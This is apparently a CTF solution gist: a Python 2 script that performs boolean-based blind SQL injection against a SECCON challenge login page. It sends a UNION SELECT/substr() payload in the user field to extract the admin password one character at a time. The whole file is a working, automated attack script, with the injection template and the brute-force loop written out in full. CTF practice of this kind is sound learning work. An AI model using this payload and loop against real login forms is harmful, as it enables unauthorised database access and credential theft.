@sota1235 /bsql.py Secret
Last active Dec 9, 2017

SqlSRF用
#!/user/bin/env python
import urllib
import urllib2
import time
# Login endpoint that every guess is POSTed to.
url = 'http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi'

# Accumulates the characters confirmed so far.
password = ''
# Number of positions the extraction loop probes.
# NOTE(review): presumably the length of the stored value -- confirm.
password_length = 32
# Position handed to SQL substr() by getSqlTemplate(); starts at 1 because
# substr() positions are 1-based.
index = 1

# Candidate alphabet tried, in this order, for each position.
chars = (
    '1234567890'
    'abcdefghijklmnopqrstuvwxyz'
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    '!?;"%&*_-/+=^#.][@()|'
)
def getSqlTemplate():
    """Return the `user` field value for the current module-level `index`.

    The returned string closes the quoted value it is placed in, appends a
    UNION SELECT that yields a fixed 32-hex-character literal only when the
    character at position `index` of the admin row's `password` column
    equals the '$string' placeholder, and comments out the rest of the
    statement with `--`. The caller substitutes '$string' with one candidate
    character.

    NOTE(review): the hex literal is presumably the value the server-side
    check compares the submitted `pass` against -- confirm.
    This only has an effect if the server concatenates the `user` field into
    its SQL text; a bound query parameter would treat it as plain data.
    """
    head = "' UNION SELECT '760de578d5d608fb420085b7697479ee' WHERE substr((SELECT password FROM users WHERE username='admin'),"
    tail = ",1)='$string'--"
    # `index` is only read here, so the module-level name resolves without
    # a `global` declaration.
    return head + str(index) + tail
# Boolean-based blind extraction: one login POST per (position, candidate)
# pair. A response containing 'document.location' is taken as "the guess
# matched".
# NOTE(review): presumably the page emits a JavaScript redirect on a
# successful login -- confirm.
# Seen from the server side this is up to password_length * len(chars)
# POSTs to the login endpoint carrying UNION SELECT / substr( in the `user`
# field, with a 0.3 s pause after each miss.
for _ in range(password_length):
    for candidate in chars:
        print('processing... character ' + candidate)
        payload = getSqlTemplate().replace('$string', candidate)
        form = urllib.urlencode({'user': payload, 'pass': 'password', 'login': 'Login'})
        body = urllib2.urlopen(urllib2.Request(url, form)).read()
        # Collapse every whitespace run to a single space before the
        # substring check.
        body = ' '.join(body.split())
        if 'document.location' not in body:
            # Miss: pause before trying the next candidate.
            time.sleep(0.3)
            continue
        # Hit: record the character and stop probing this position.
        password += candidate
        break
    # Advance the substr() position whether or not a candidate matched; a
    # position with no match leaves `password` one character short.
    index += 1
print(password)